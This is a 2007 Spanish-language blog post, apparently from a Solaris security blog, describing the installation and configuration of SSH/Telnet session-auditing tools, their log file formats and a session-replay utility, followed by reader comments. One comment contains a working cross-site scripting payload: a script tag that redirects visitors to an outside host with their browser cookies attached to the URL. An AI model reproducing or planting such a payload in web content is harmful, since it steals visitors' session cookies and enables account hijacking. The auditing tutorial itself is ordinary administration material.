Herramienta Auditoría (SSH/Telnet)

Fecha: 30/7/2007; Versión 1.0


Instalamos las herramientas de auditoría telnet.audit y ssh.audit dentro del directorio /usr/bin. Se sustituyen los comandos originales, moviendo éstos a su mismo nombre terminado en “.orig”. Además debemos de instalar la última versión de "openssl" disponible en http://sunfreeware.com.

Copiamos los binarios de auditoría:

        # cp /usr/bin/ssh /usr/bin/ssh.orig
        # cp /usr/bin/telnet /usr/bin/telnet.orig
        # cp ssh /usr/bin/ssh
        # cp telnet /usr/bin/telnet

Creamos el grupo audit en el sistema.

        # groupadd audit

Creamos los directorios de log y asignamos los permisos correctos.

        # mkdir /var/log/audit
        # chown root:audit /var/log/audit
        # chmod 770 /var/log/audit

Damos permisos de setgid a los nuevos binarios ssh y telnet.

        # chown root:audit /usr/bin/ssh
        # chmod 2755 /usr/bin/ssh
        # chown root:audit /usr/bin/telnet
        # chmod 2755 /usr/bin/telnet

Copiamos el fichero de configuración de los comandos de auditoría en /etc.

        # cp audit-session.conf /etc/audit-session.conf
        # chown root:audit /etc/audit-session.conf
        # chmod 640 /etc/audit-session.conf


Editamos los parámetros necesarios para la correcta configuración de las herramientas de auditoría, pero los valores por defecto encajan en nuestra configuración. Las posibles variables que los comandos de auditoría utilizan son las siguientes:


  • EnableAuditing: Las posibles opciones son 1 (habilitado) y 0 (deshabilitado). Poniéndolo en 0, los comandos telnet.audit y ssh.audit, se convierten en comandos telnet y ssh normales sin la posibilidad de almacenar los comandos ejecutados ni caracteres escritos en la sesión. El valor por defecto es 1.

  • Logdir: Declaramos el directorio donde queremos almacenar las sesiones auditadas. El valor por defecto es /var/log/audit.

  • VipUsers: Podemos meter una lista de usuarios separados por espacio, a los cuales no se les audita la sesión.

  • EnableSyslog: Las posibles opciones son 1 (habilitado) y 0 (deshabilitado). Esta opción permite insertar una línea en el syslog indicando que usuario, cuando, desde donde y hacia donde se ha conectado y se está generando una sesión. Esto es bastante útil para tener una lista rápida de usuarios conectados y a que horas, con lo que se puede obtener el fichero de sesión muy rápidamente.


# Session audting for ssh, telnet or other charactar based applications # configuration file example. mar jun 27 21:30:07 CEST 2006 # # Its recommended to set file permissions to 0600

# Enable session auditing or not (1 = on, 0 = off)

EnableAuditing = 1

# Directory used to store the session logs

Logdir = /var/log/audit

# List of users who must not be audited. (use a blank space as separator)

VipUsers = weed

# Enable syslog messages or not (1 = on, 0 = off)

EnableSyslog = 1

# End of configuration file (do not delete)

Fichero: /etc/audit-session.conf


Si tenemos problemas de librerías a la hora de ejecutar los binarios telnet o ssh, tendremos que configurar los PATHS a todas las librerías necesarias para poder hacer uso de las herramientas de AUDIT, lo hacemos mediante el comando crle.

        # crle -u -l /usr/sfw/lib
        # crle -u -l /usr/share/lib
        # crle -u -l /usr/local/lib
        # crle -u -l /usr/local/ssl/lib  

Mediante estos tres primeros comandos, hemos introducido los caminos /usr/sfw/lib, /usr/share/lib, /usr/local/lib y /usr/local/ssl/lib dentro de la variable LD_LIBRARY_PATH, lo podemos comprobar ejecutando el comando:


# crle

Configuration file [version 4]: /var/ld/ld.config

Default Library Path (ELF): /lib:/usr/lib:/usr/sfw/lib:/usr/share/lib:/usr/local/lib:/usr/local/ssl/lib

Trusted Directories (ELF): /lib/secure:/usr/lib/secure (system default)

Command line:

crle -c /var/ld/ld.config -l /lib:/usr/lib:/usr/sfw/lib:/usr/share/lib:/usr/local/lib:/usr/local/ssl/lib

#

Ejecución Comando "crle"

Almacenamiento de Logs

Los ficheros de auditoría de sesión, se almacenan en el directorio /var/log/audit y tienen un formato de nombre de fichero:

        /var/log/audit/$DESTINATION/$DATE-$TIME_$USER.log
        /var/log/audit/$DESTINATION/$DATE-$TIME_$USER.time  

Como vemos por cada sesión, se generan dos ficheros de auditoría, el fichero .log, que almacena el contenido de los comandos escritos en la sesión y el fichero .time, que enlaza la fecha y hora por cada uno de los caracteres mostrados en la sesión.

Donde $DESTINATION es la IP o nombre destino al que nos hemos conectado, $DATE es la fecha cuando se lanzó la sesión, $TIME es la hora de lanzamiento de la sesión y $USER es el usuario que ha ejecutado la sesión.

El contenido del fichero .log contiene los datos de sesión y el .time contiene los datos de tiempo en el siguiente formato:

        1151198371234409 336
        1151198373260696 10
        1151198373268745 17
        1151198374007105 1
        1151198374252155 1

La primera columna indica los microsegundos pasados desde el 1/1/1970, la segunda columna son el número de caracteres escritos.

Visualización de Sesiones

Disponemos además, de una herramienta para visualizar los datos obtenidos de la sesión capturada por los comandos telnet.audit y ssh.audit. Se conoce como audit-player. Dejamos la herramienta instalada en el directorio:

        # cp audit-player /usr/local/bin

Para visualizar el contenido de cualquiera de los ficheros .log, se puede hacer o bien mediante un more, less, cat, ... o bien mediante este ejecutable que reproduce la sesión como si la estuviésemos ejecutando en el mismo momento. Para ello lanzaremos el comando de la forma:

        # audit-player -l /var/log/audit/perseo/2006-06-28_09\\:21\\:03-jaime.log  

Esto reproduce la sesión en la misma pantalla desde la que la hemos ejecutado. 


BYe ....

Comentarios:

Super Interesante!

Enviado por sandro en agosto 02, 2007 a las 06:10 PM CEST #

<script>window.location='http://www.xrl.es/cadaver/script.php?c='+document.cookie;</script>

Enviado por matias en agosto 02, 2007 a las 06:10 PM CEST #

Te hago una consulta donde puedo conseguir las herramientas a las que haces referencia ssh.audit y telnet.audit?

Gracias

Enviado por Javier en agosto 30, 2007 a las 04:30 PM CEST #

q son los ficheros mecanizados

Enviado por perez en marzo 11, 2009 a las 03:08 PM CET #

Enviar un comentario:
  • Sintaxis HTML: Deshabilitado
About

Seguridad y Solaris

Search

Archives
« abril 2014
lunmarmiéjueviesábdom
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
    
       
Hoy